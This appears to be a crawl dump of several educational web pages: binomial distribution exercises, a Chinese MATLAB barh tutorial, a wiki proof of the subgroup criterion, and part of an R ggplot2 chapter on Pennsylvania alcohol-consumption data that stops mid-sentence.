{"ft_lang_label":"__label__en","ft_lang_prob":0.8789578,"math_prob":0.9952212,"size":955,"snap":"2022-40-2023-06","text_gpt3_token_len":333,"char_repetition_ratio":0.1409043,"word_repetition_ratio":0.0,"special_character_ratio":0.42198953,"punctuation_ratio":0.12560387,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9974543,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,6,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-02-03T06:19:41Z\",\"WARC-Record-ID\":\"<urn:uuid:f413abda-1f4e-472a-830a-04cdaf2f78a0>\",\"Content-Length\":\"61674\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7a43e9ef-f1c2-4cbb-b9a3-39cc0061dc2b>\",\"WARC-Concurrent-To\":\"<urn:uuid:7cbf28f9-fcca-4dbb-8d3e-06225f3a6e24>\",\"WARC-IP-Address\":\"192.0.78.222\",\"WARC-Target-URI\":\"https://findthefactors.com/2018/07/12/1127-and-level-5/\",\"WARC-Payload-Digest\":\"sha1:PPPV3NINHNU2KORN2SWGEG2TBM673ZLY\",\"WARC-Block-Digest\":\"sha1:OHHGE5GK4IARX3E3SLDHGYBJW5ZBUXU5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764500044.16_warc_CC-MAIN-20230203055519-20230203085519-00113.warc.gz\"}"}
https://www.studypug.com/ca/statistics/binomial-distribution
[ "# Binomial distribution\n\n### Binomial distribution\n\n#### Lessons\n\n$P(x)={_n}C_x \\;P^x(1-p)^{n-x}$\n\n$n$: number of trials\n$x$: number of success in n trials\n$p$: probability of success in each trial\n$P(x)$: probability of getting $x$ successes (out of $n$ trials)\n\n$\\cdot$ binomialpdf $(n,p,x)$\n$\\cdot$ binomialcdf $(n,p,x)$\n• Introduction\na)\nBinomial\n\nb)\nBinomial Formula\n\nc)\nBinomialpdf Calculator\n\n• 1.\nIdentify which of the following experiments below are binomial distributions?\n\ni. A fair die is rolled 4 times. What is the probability of the one coming up 2 times?\n\nii. A fair coin is flipped until head comes up 7 times. What is the probability that the coin will be flipped 10 times?\n\niii. 1,000,000 nails are produced in a factory a day. If each nail has a probability of 0.5% of being defective (something being wrong with that nail), then what is the probability that less than 50 nails will be defective in a day?\n\niv. Roughly 7.5% of Canadians have some form of heart disease. If 100 Canadians are sampled what is the probability that 10 of them will have heart disease?\n\nv. If 5 cards are drawn from a deck, what is the probability that 2 of them will be hearts?\n\nvi. If a fair die is rolled 8 times, what is the probability of getting 2 fours and 3 sixes?\n\n• 2.\nA die is rolled 3 times, what is the probability that a four is rolled exactly 2 times?\n\n• 3.\nA coin is flipped 20 times, what is the probability that the coin comes up heads 15 times?\n\n• 4.\nJimmy the Joker is an unfair gambler. He weights a die so it rolls a \"6\" with 75% chance. He then bets that if he rolls his die 4 times he will roll six exactly 3 times. What is his probability of winning this bet?\n\n• 5.\nThomas is packing for a trip and wants to bring some stuffed animals along for comfort. He owns 8 stuffed animals, and will pack each stuffed animals independently of all the others with a probability of 30%. Determine the probability that he takes;\na)\n0 stuffed animals along with him.\n\nb)\n1 stuffed animal with him\n\nc)\nat most two animals along with him.\n\nd)\nat most 5 animals along with him.\n\ne)\nat least 6 animals along with him." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.94694513,"math_prob":0.99126416,"size":2035,"snap":"2019-43-2019-47","text_gpt3_token_len":500,"char_repetition_ratio":0.17823732,"word_repetition_ratio":0.038997214,"special_character_ratio":0.23980343,"punctuation_ratio":0.12,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9982786,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-21T04:02:51Z\",\"WARC-Record-ID\":\"<urn:uuid:3c8045c0-9bff-4371-98f9-993aa4c6b069>\",\"Content-Length\":\"198884\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:627d24e8-f7e6-4fd7-a1b9-dd6c67ed5d11>\",\"WARC-Concurrent-To\":\"<urn:uuid:d4496f0a-fcaa-4e34-af42-6c9cc531ac48>\",\"WARC-IP-Address\":\"34.200.169.6\",\"WARC-Target-URI\":\"https://www.studypug.com/ca/statistics/binomial-distribution\",\"WARC-Payload-Digest\":\"sha1:AOTHD4ZTIQLMWKJHQWZASOGUDQQ64CIB\",\"WARC-Block-Digest\":\"sha1:LXJGDT5VLJHLBY5HJFEWYHCUS6G2ZY7W\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496670729.90_warc_CC-MAIN-20191121023525-20191121051525-00139.warc.gz\"}"}
https://iymark.com/program/matlab-scatter-function-barh.html
[ "# Matlab水平条形图创建函数barh教程\n\n4\n(4)\n\n```>> help barh\nbarh Horizontal bar graph.\nbarh(X,Y) draws the columns of the M-by-N matrix Y as M groups of\nN horizontal bars. The vector X must not have duplicate values.\n\nbarh(Y) uses the default value of X=1:M. For vector inputs,\nbarh(X,Y) or barh(Y) draws LENGTH(Y) bars. The colors are set by\nthe colormap.\n\nbarh(X,Y,WIDTH) or barh(Y,WIDTH) specifies the width of the\nbars. Values of WIDTH > 1, produce overlapped bars. The\ndefault value is WIDTH=0.8.\n\nbarh(...,'grouped') produces the default horizontal grouped bar chart.\nbarh(...,'stacked') produces a horizontal stacked bar chart.\nbarh(...,LINESPEC) uses the line color specified (one of 'rgbymckw').\n\nbarh(AX,...) plots into AX instead of GCA.\n\nH = barh(...) returns a vector of handles to barseries objects.\n\nUse SHADING FACETED to put edges on the bars. Use SHADING FLAT to\nturn them off.\n\nExamples: subplot(3,1,1), barh(rand(10,5),'stacked'), colormap(cool)\nsubplot(3,1,2), barh(0:.25:1,rand(5),1)\nsubplot(3,1,3), barh(rand(2,3),.75,'grouped')```\n\n## 常见用法\n\n```barh(y)\nbarh(x,y)\nbarh(___,width)\nbarh(___,style)\nbarh(___,color)\nbarh(___,Name,Value)\nbarh(ax,___)\nb = barh(___)```\n\n## 语法说明\n\nbarh(y) 创建一个水平条形图,每个条形对应 y 中一个元素。如果 y 是 m×n 矩阵,则 barh 创建每组包含 n 个条形的 m 个组。\n\nbarh(x,y) 沿垂直轴在 x 指定的位置绘制条形。\n\nbarh(___,width) 指定每个条形占用的可用空间比例。例如,barh(y,1) 让每组中的条形紧挨在一起。将 width 指定为上述任一语法中的最后一个参数。\n\nbarh(___,style) 指定条形组的样式。例如,barh(y,’stacked’) 将每组中的条形堆叠成一个多色条形。\n\nbarh(___,color) 为所有条形指定单一颜色。例如,barh(y,’red’) 显示红色条形。\n\nbarh(___,Name,Value) 使用一个或多个名称-值对组参数指定条形图的属性。仅使用默认 ‘grouped’ 或 ‘stacked’ 样式的条形图支持设置条形属性。在所有其他输入参数之后指定名称-值对组参数。\n\nbarh(ax,___) 在目标坐标区中显示条形图。将坐标区指定为上述任一语法中的第一个参数。\n\nb = barh(___) 返回一个或多个 Bar 对象。如果 y 是向量,则 barh 返回一个 Bar 对象。如果 y 是矩阵,则 barh 为每个序列返回一个 Bar 对象。显示条形图后,使用 b 设置条形的属性。\n\n## 显示一个条形序列\n\n```y = [10 20 30 41];\nbarh(y)```\n\n## 显示具有轴标签和图例的四个条形序列\n\n```x = [1980 1990 2000];\ny = [40 50 63 52; 42 55 50 48; 30 20 44 40];\nbarh(x,y)\nxlabel('Snowfall')\nylabel('Year')\nlegend({'Springfield','Fairview','Bristol','Jamesville'})```\n\n## 更改基准值\n\n```y = [8 15 33; 30 35 40; 50 55 62];\nbarh(y,'BaseValue',25)```\n\n## 显示具有负数据的堆叠条形\n\n```x = [1980 1990 2000];\ny = [15 20 -5; 10 -17 21; -10 5 15];\nbarh(x,y,'stacked')```\n\n## 自定义垂直轴刻度标签\n\n```y = [10 20 30 41];\nbarh(y)\nyticklabels({'April','May','June','July'})```\n\nMatlab2016中不支持yticklabels函数,其官方运行结果如下:\n\n## 指定分类数据\n\n```X = categorical({'Small','Medium','Large','Extra Large'});\nX = reordercats(X,{'Small','Medium','Large','Extra Large'});\nY = [10 21 33 52];\nbarh(X,Y)```\n\nMatlab2016中,不支持reordercats函数,其官方运行结果如下:\n\n## 在条形末端添加标签\n\n```x = [1 2 3];\nvals = [2 3 6; 11 23 26];\nb = barh(x,vals);```\n\n```xtips1 = b(1).YEndPoints + 0.3;\nytips1 = b(1).XEndPoints;\nlabels1 = string(b(1).YData);\ntext(xtips1,ytips1,labels1,'VerticalAlignment','middle')```\n\n```xtips2 = b(2).YEndPoints + 0.3;\nytips2 = b(2).XEndPoints;\nlabels2 = string(b(2).YData);\ntext(xtips2,ytips2,labels2,'VerticalAlignment','middle')```\n\n## 指定条形宽度和颜色\n\n```y = [10 22 30 42];\nwidth = 0.4;\nbarh(y,width,'red');```\n\n## 自定义一个条形序列\n\n```y = [10 15 20; 30 35 40; 50 55 62];\nb = barh(y);```\n\n```b(2).FaceColor = [.2 .6 .5];\nb(2).EdgeColor = [.63 .08 .18];\nb(2).LineWidth = 2;```\n\n## 比较不同的条形样式\n\n```x = [1980 1990 2000];\ny = [8 15 25; 30 35 40; 50 55 62];\n\n% Grouped\ntiledlayout(2,1);\nax1 = nexttile;\nbarh(ax1,x,y)\ntitle('Grouped Style')\n\n% Stacked\nax2 = nexttile;\nbarh(ax2,x,y,'stacked')\ntitle('Stacked Style')```\n\nMatlab2016中,不支持tiledlayout以及nexttile函数,因此我们用subplot函数来分区域显示图形,代码如下:\n\n```x = [1980 1990 2000];\ny = [8 15 25; 30 35 40; 50 55 62];\n\n% Grouped\nsubplot(2,1,1)\nbarh(x,y)\ntitle('Grouped Style')\n\n% Stacked\nsubplot(2,1,2)\nbarh(x,y,'stacked')\ntitle('Stacked Style')```", null, "" ]
[ null, "https://oss.iymark.com/2021/03/apkdownload.png", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.6336454,"math_prob":0.99465156,"size":4789,"snap":"2021-31-2021-39","text_gpt3_token_len":2685,"char_repetition_ratio":0.105329156,"word_repetition_ratio":0.08301887,"special_character_ratio":0.32825226,"punctuation_ratio":0.20247933,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9784937,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-26T09:52:03Z\",\"WARC-Record-ID\":\"<urn:uuid:59922160-1c56-4724-8ada-a31b6d7e2b1b>\",\"Content-Length\":\"87344\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7e51f600-dc06-4fee-b891-73e5591c9703>\",\"WARC-Concurrent-To\":\"<urn:uuid:4b4f9f8b-b005-4a84-b83c-23b9d2be31a7>\",\"WARC-IP-Address\":\"47.115.48.89\",\"WARC-Target-URI\":\"https://iymark.com/program/matlab-scatter-function-barh.html\",\"WARC-Payload-Digest\":\"sha1:IX74OAJZ5KJZMXSFQQKQSYDOONEMPH6Q\",\"WARC-Block-Digest\":\"sha1:IX2CXIMB7XIA2YFZTBLERFMCGX3IBJFJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780057857.27_warc_CC-MAIN-20210926083818-20210926113818-00148.warc.gz\"}"}
https://groupprops.subwiki.org/wiki/Sufficiency_of_subgroup_criterion
[ "# Sufficiency of subgroup criterion\n\n## Contents\n\nThis article gives the statement, and possibly proof, of a basic fact in group theory.\nView a complete list of basic facts in group theory\nVIEW FACTS USING THIS: directly | directly or indirectly, upto two steps | directly or indirectly, upto three steps|\nThis article gives a proof/explanation of the equivalence of multiple definitions for the term subgroup\nView a complete list of pages giving proofs of equivalence of definitions\n\n## Statement\n\nFor a subset", null, "$H$ of a group", null, "$G$, the following are equivalent:\n\n1.", null, "$H$ is a subgroup, viz", null, "$H$ is closed under the binary operation of multiplication, the inverse map, and contains the identity element\n2.", null, "$H$ is a nonempty set closed under left quotient of elements (that is, for any", null, "$a, b$ in", null, "$H$,", null, "$b^{-1}a$ is also in", null, "$H$)\n3.", null, "$H$ is a nonempty set closed under right quotient of elements (that is, for any", null, "$a, b$ in", null, "$H$,", null, "$ab^{-1}$ is also in", null, "$H$)\n\n## Proof\n\nWe shall here prove the equivalence of the first two conditions. Equivalence of the first and third conditions follows by analogous reasoning.\n\n### (1) implies (2)\n\nClearly, if", null, "$H$ is a subgroup:\n\n•", null, "$H$ is nonempty since", null, "$H$ contains the identity element\n• Whenever", null, "$a, b$ are in", null, "$H$ so is", null, "$b^{-1}$ and hence", null, "$b^{-1}a$\n\n### (2) implies (1)\n\nSuppose", null, "$H$ is a nonempty subset closed under left quotient of elements. Then, pick an element", null, "$u$ from", null, "$H$. (VIDEO WARNING: In the embeddded video, the letter", null, "$a$ is used in place of", null, "$u$, which is a little unwise, but the spirit of reasoning is the same).\n\n•", null, "$e$ is in", null, "$H$: Set", null, "$a = b = u$ to get", null, "$u^{-1}u$ is contained in", null, "$H$, hence", null, "$e$ is in", null, "$H$\n•", null, "$g \\in H \\implies g^{-1} \\in H$: Now that", null, "$e$ is in", null, "$H$, set", null, "$b = g, a =e$ to get", null, "$b^{-1}a = g^{-1}e$ is also in", null, "$H$, so", null, "$g^{-1}$ is in", null, "$H$\n•", null, "$x,y \\in H \\implies xy \\in H$: Set", null, "$a = y, b= x^{-1}$. The previous step tells us both are in", null, "$H$. So", null, "$b^{-1}a = (x^{-1})^{-1}y$ is in", null, "$H$, which tells us that", null, "$xy$ is in", null, "$H$.\n\nThus,", null, "$H$ satisfies all the three conditions to be a subgroup." ]
[ null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/d/f/c/dfcf28d0734569a6a693bc8194de62bf.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/b/3/4/b345e1dc09f20fdefdea469f09167892.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/d/1/4/d1401b88dc1ca9a0cc3c986da90aa1d9.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/b/3/4/b345e1dc09f20fdefdea469f09167892.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/3/0/9/309e5e7416605b7f3302f981e9d2b36c.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/b/3/4/b345e1dc09f20fdefdea469f09167892.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/8/3/a/83a2628e12eb8f3c30e16c050313498a.png ", null, "https://groupprops.subwiki.org/w/images/math/d/1/4/d1401b88dc1ca9a0cc3c986da90aa1d9.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/7/b/7/7b774effe4a349c6dd82ad4f4f21d34c.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/0/c/c/0cc175b9c0f1b6a831c399e269772661.png ", null, "https://groupprops.subwiki.org/w/images/math/7/b/7/7b774effe4a349c6dd82ad4f4f21d34c.png ", null, "https://groupprops.subwiki.org/w/images/math/e/1/6/e1671797c52e15f763380b45e841ec32.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/e/8/3/e83b72c4972714b33c6a84d4a4b6f380.png ", null, "https://groupprops.subwiki.org/w/images/math/c/4/1/c41fffd315e150055345c070c99d5792.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/e/1/6/e1671797c52e15f763380b45e841ec32.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/a/e/d/aed0af44ab9ce990ef6a64984d7e4951.png ", null, "https://groupprops.subwiki.org/w/images/math/e/1/6/e1671797c52e15f763380b45e841ec32.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/f/0/0/f000f461fabde763b206964d228a6cea.png ", null, "https://groupprops.subwiki.org/w/images/math/7/c/a/7ca808559a2be907b011a93cb953499e.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/f/b/3/fb339a23074abf4e00615903229a3555.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/f/8/9/f897519ab9401e8ef3808c325a495eb9.png ", null, "https://groupprops.subwiki.org/w/images/math/2/a/4/2a4047d17c3efc6d0b8e44df89413bbe.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/7/c/a/7ca40c668bfdb75837a095a68a43e250.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/3/e/4/3e44107170a520582ade522fa73c1d15.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.91200703,"math_prob":0.99982065,"size":1686,"snap":"2020-24-2020-29","text_gpt3_token_len":383,"char_repetition_ratio":0.11117717,"word_repetition_ratio":0.10897436,"special_character_ratio":0.22835113,"punctuation_ratio":0.121212125,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999912,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-09T10:48:24Z\",\"WARC-Record-ID\":\"<urn:uuid:b7c7d72a-8331-429d-af1e-f4c8c97e8c5e>\",\"Content-Length\":\"33628\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a43922cb-e94c-440c-a695-9817cef16651>\",\"WARC-Concurrent-To\":\"<urn:uuid:17cb833d-7117-4df7-8b14-9e41befa0dfa>\",\"WARC-IP-Address\":\"96.126.114.7\",\"WARC-Target-URI\":\"https://groupprops.subwiki.org/wiki/Sufficiency_of_subgroup_criterion\",\"WARC-Payload-Digest\":\"sha1:LYEJQHE2ARV35HNKWQ52BFNBRKAN6C2S\",\"WARC-Block-Digest\":\"sha1:BJO2RZAULUHSHL4THAF5XFOMXFFJE4ZH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593655899931.31_warc_CC-MAIN-20200709100539-20200709130539-00101.warc.gz\"}"}
https://crimebythenumbers.com/graphing-intro.html
[ "# 14 Graphing with `ggplot2`\n\nFor this chapter you’ll need the following file, which is available for download here: apparent_per_capita_alcohol_consumption.rda.\n\nWe’ve made some simple graphs earlier; in this lesson we will use the package `ggplot2` to make simple and elegant-looking graphs.\n\nThe “gg” part of `ggplot2` stands for “grammar of graphics”, which is the idea that most graphs can be made using the same few “pieces.” We’ll get into those pieces during this lesson. For a useful cheat sheet for this package see here.\n\n``install.packages(\"ggplot2\")``\n``library(ggplot2)``\n\nWhen working with new data, it’s often useful to quickly graph the data to try to understand what you’re working with. It is also useful when understanding how much to trust the data.\n\nThe data we will work on is data about alcohol consumption in US states from 1977-2017 from the National Institutes of Health. It contains the per capita alcohol consumption for each state for every year. Their method to determine per capita consumption is amount of alcohol sold / number of people aged 14+ living in the state. More details on the data are available here.\n\nNow we need to load the data.\n\n``load(\"data/apparent_per_capita_alcohol_consumption.rda\")``\n\nThe name of the data is quite long so for convenience let’s copy it to a new object with a better name, alcohol.\n\n``alcohol <- apparent_per_capita_alcohol_consumption``\n\nThe original data has every state, region, and the US as a whole. For this lesson we’re using data subsetted to just include states. For now let’s just look at Pennsylvania.\n\n``penn_alcohol <- alcohol[alcohol\\$state == \"pennsylvania\", ]``\n\n## 14.1 What does the data look like?\n\nBefore graphing, it’s helpful to see what the data includes. An important thing to check is what variables are available and what the units are for these variables.\n\n``````head(penn_alcohol)\n# state year ethanol_beer_gallons_per_capita ethanol_wine_gallons_per_capita\n# 1559 pennsylvania 2017 1.29 0.33\n# 1560 pennsylvania 2016 1.31 0.33\n# 1561 pennsylvania 2015 1.31 0.32\n# 1562 pennsylvania 2014 1.32 0.32\n# 1563 pennsylvania 2013 1.34 0.31\n# 1564 pennsylvania 2012 1.36 0.31\n# ethanol_spirit_gallons_per_capita ethanol_all_drinks_gallons_per_capita number_of_beers\n# 1559 0.71 2.34 305.7778\n# 1560 0.72 2.36 310.5185\n# 1561 0.70 2.33 310.5185\n# 1562 0.70 2.34 312.8889\n# 1563 0.68 2.33 317.6296\n# 1564 0.67 2.34 322.3704\n# number_of_glasses_wine number_of_shots_liquor number_of_drinks_total\n# 1559 65.48837 147.4128 499.2000\n# 1560 65.48837 149.4891 503.4667\n# 1561 63.50388 145.3366 497.0667\n# 1562 63.50388 145.3366 499.2000\n# 1563 61.51938 141.1841 497.0667\n# 1564 61.51938 139.1079 499.2000``````\n\nSo each row of the data is a single year of data for Pennsylvania. It includes alcohol consumption for wine, liquor, beer, and total drinks - both as gallons of ethanol (a hard unit to interpret) and more traditional measures such as glasses of wine or number of beers. The original data only included the gallons of ethanol data, which I converted to the more understandable units. If you encounter data with odd units, it is a good idea to convert it to something easier to understand - especially if you intend to show someone else the data or results.\n\n## 14.2 Graphing data\n\nTo make a plot using `ggplot()` (please note that the function does not have a 2 at the end of it, only the package name does), all you need to do is specify the data set and the variables you want to plot. From there you add on pieces of the graph using the `+` symbol (which operates like a `dplyr` pipe) and then specify what you want added.\n\nFor `ggplot()` we need to specify four things:\n\n1. The data set\n2. The x-axis variable\n3. The y-axis variable\n4. The type of graph - e.g. line, point, etc.\n\nSome useful types of graphs are:\n\n• `geom_point()` - A point graph, can be used for scatter plots\n• `geom_line()` - A line graph\n• `geom_bar()` - A barplot\n• `geom_smooth()` - Adds a regression line to the graph\n\n## 14.3 Time-series plots\n\nLet’s start with a time-series of beer consumption in Pennsylvania. In time-series plots the x-axis is always the time variable while the y-axis is the variable whose trend over time is what we’re interested in. When you see a graph showing, for example, crime rates over time, this is the type of graph you’re looking at.\n\nThe code below starts by writing our data set name. Then says what our x- and y-axis variables are called. The x- and y-axis variables are within parentheses of the function called `aes()`. `aes()` stands for aesthetic, and what’s included inside here describes how the graph will look. It’s not intuitive to remember, but you need to include it. Like in `dplyr` functions, you do not need to put the column names in quotes or repeat which data set you are using.\n\n``````ggplot(penn_alcohol, aes(\nx = year,\ny = number_of_beers\n))``````", null, "Note that on the x-axis it prints out every single year and makes it completely unreadable. That is because the “year” column is a character type, so R thinks each year is its own category. It prints every single year because it thinks we want every category shown. To fix this, we can make the column numeric, and `ggplot()` will be smarter about printing fewer years.\n\n``penn_alcohol\\$year <- as.numeric(penn_alcohol\\$year)``\n``````ggplot(penn_alcohol, aes(\nx = year,\ny = number_of_beers\n))``````", null, "When we run it, we get our graph. It includes the variable names for each axis and shows the range of data through the tick marks. What is missing is the actual data. For that we need to specify what type of graph it is. We literally add it with the `+` followed by the type of graph we want. Make sure that the `+` is at the end of a line, not the start of one. Starting a line with the + will not work.\n\n``````ggplot(penn_alcohol, aes(\nx = year,\ny = number_of_beers\n)) +\ngeom_point()``````", null, "``````ggplot(penn_alcohol, aes(\nx = year,\ny = number_of_beers\n)) +\ngeom_line()``````", null, "We can also combine different types of graphs.\n\n``````ggplot(penn_alcohol, aes(\nx = year,\ny = number_of_beers\n)) +\ngeom_point() +\ngeom_line()``````", null, "It looks like there’s a huge change in beer consumption over time. But look at where they y-axis starts. It starts around 280 so really that change is only ~60 beers. That’s because when graphs don’t start at 0, it can make small changes appear big. We can fix this by forcing the y-axis to begin at 0. We can add `expand_limits(y = 0)` to the graph to say that the value 0 must always appear on the y-axis, even if no data is close to that value.\n\n``````ggplot(penn_alcohol, aes(\nx = year,\ny = number_of_beers\n)) +\ngeom_point() +\ngeom_line() +\nexpand_limits(y = 0)``````", null, "Now that graph shows what looks like nearly no change even though that is also not true. Which graph is best? It’s hard to say.\n\nInside the types of graphs we can change how it is displayed. As with using `plot()`, we can specify the color and size of our lines or points.\n\n``````ggplot(penn_alcohol, aes(\nx = year,\ny = number_of_beers\n)) +\ngeom_line(color = \"forestgreen\", size = 1.3)``````", null, "Some other useful features are changing the axis labels and the graph title. Unlike in `plot()` we do not include it in the () of `ggplot()` but use their own functions to add them to the graph. The input to each of these functions is a string for what we want it to say.\n\n• `xlab()` - x-axis label\n• `ylab()` - y-axis label\n• `ggtitle()` - graph title\n``````ggplot(penn_alcohol, aes(\nx = year,\ny = number_of_beers\n)) +\ngeom_line(color = \"forestgreen\", size = 1.3) +\nxlab(\"Year\") +\nylab(\"Number of Beers\") +\nggtitle(\"PA Annual Beer Consumption Per Capita (1977-2017)\")``````", null, "Many time-series plots show multiple variables over the same time period (e.g. murder and robbery over time). There are ways to change the data itself to make creating graphs like this easier, but let’s stick with the data we currently have and just change `ggplot()`.\n\n``````ggplot(penn_alcohol, aes(\nx = year,\ny = number_of_glasses_wine\n)) +\ngeom_line()``````", null, "Then include a second `geom_line()` with its own `aes()` for the second variable. Since we are using the penn_alcohol data set for both lines we do not need to include it in the second `geom_line()` as it assumes that the data is the same if we don’t specify otherwise. If we used a different data set for the second line, we would need to specify which data set it is inside of `geom_line()` and before `aes()`.\n\n``````ggplot(penn_alcohol, aes(\nx = year,\ny = number_of_glasses_wine\n)) +\ngeom_line() +\ngeom_line(aes(\nx = year,\ny = number_of_shots_liquor\n))``````", null, "A problem with this is that both lines are the same color. We need to set a color for each line and do so within `aes()`. Instead of providing a color name, we need to provide the name the color will have in the legend. Do so for both lines.\n\n``````ggplot(penn_alcohol, aes(\nx = year,\ny = number_of_glasses_wine,\ncolor = \"Glasses of Wine\"\n)) +\ngeom_line() +\ngeom_line(aes(\nx = year,\ny = number_of_shots_liquor,\ncolor = \"Shots of Liquor\"\n))``````", null, "We can change the legend title by using the function `labs()` and changing the value `color` to what we want the legend title to be.\n\n``````ggplot(penn_alcohol, aes(\nx = year,\ny = number_of_glasses_wine,\ncolor = \"Glasses of Wine\"\n)) +\ngeom_line() +\ngeom_line(aes(\nx = year,\ny = number_of_shots_liquor,\ncolor = \"Shots of Liquor\"\n)) +\nlabs(color = \"Alcohol Type\")``````", null, "Finally, a useful option to move the legend from the side to the bottom is setting the `theme()` function to move the `legend.position` to “bottom”. This will allow the graph to be wider.\n\n``````ggplot(penn_alcohol, aes(\nx = year,\ny = number_of_glasses_wine,\ncolor = \"Glasses of Wine\"\n)) +\ngeom_line() +\ngeom_line(aes(\nx = year,\ny = number_of_shots_liquor,\ncolor = \"Shots of Liquor\"\n)) +\nlabs(color = \"Alcohol Type\") +\ntheme(legend.position = \"bottom\")``````", null, "## 14.4 Scatter plots\n\nMaking a scatter plot simply requires changing the x-axis from year to another numerical variable and using `geom_point()`. Since our data has one row for every 